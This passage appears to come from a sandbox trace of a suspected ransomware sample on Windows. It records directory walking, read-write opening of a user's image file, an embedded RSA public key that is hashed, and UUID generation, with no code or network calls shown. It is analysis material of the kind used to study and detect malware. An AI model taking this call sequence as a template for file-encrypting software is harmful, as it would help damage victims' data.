hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.002] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\") returned="f6AdJjDhQ\\" [0199.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0199.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.002] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\") returned="5Ctq03jfOkJI397\\" [0199.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0199.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0199.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\") returned="YnPBSI277\\" [0199.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeae30 [0199.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0199.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeae30 | out: hHeap=0x2c0000) returned 1 [0199.004] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.004] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.004] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.004] PathFindFileNameW (pszPath="") returned="" [0199.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.005] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c8da6d0, ftCreationTime.dwHighDateTime=0x1d8a667, ftLastAccessTime.dwLowDateTime=0x5c65aa00, ftLastAccessTime.dwHighDateTime=0x1d8a6a9, ftLastWriteTime.dwLowDateTime=0x5c65aa00, ftLastWriteTime.dwHighDateTime=0x1d8a6a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0199.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.008] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c8da6d0, ftCreationTime.dwHighDateTime=0x1d8a667, ftLastAccessTime.dwLowDateTime=0x5c65aa00, ftLastAccessTime.dwHighDateTime=0x1d8a6a9, ftLastWriteTime.dwLowDateTime=0x5c65aa00, ftLastWriteTime.dwHighDateTime=0x1d8a6a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.008] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa382e6c0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x6bc23aa0, ftLastAccessTime.dwHighDateTime=0x1d8a4fa, ftLastWriteTime.dwLowDateTime=0x6bc23aa0, ftLastWriteTime.dwHighDateTime=0x1d8a4fa, nFileSizeHigh=0x0, nFileSizeLow=0xbd73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="59BurO.bmp", cAlternateFileName="")) returned 1 [0199.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.009] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\59BurO.bmp") returned=".bmp" [0199.009] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\59BurO.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\59buro.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.010] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=48499) returned 1 [0199.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.013] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbd4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.013] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.015] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.015] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xbd73, lpOverlapped=0x0) returned 1 [0199.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.016] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.017] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.017] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.017] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.018] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.018] GetLastError () returned 0x0 [0199.018] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.018] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.018] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.018] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.018] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbd70) returned 0x2af7168 [0199.019] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeae30 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade6f8 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.020] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0199.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae69e0 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.023] GetCurrentThreadId () returned 0x5d8 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5840 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.024] GetCurrentThreadId () returned 0x5d8 [0199.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 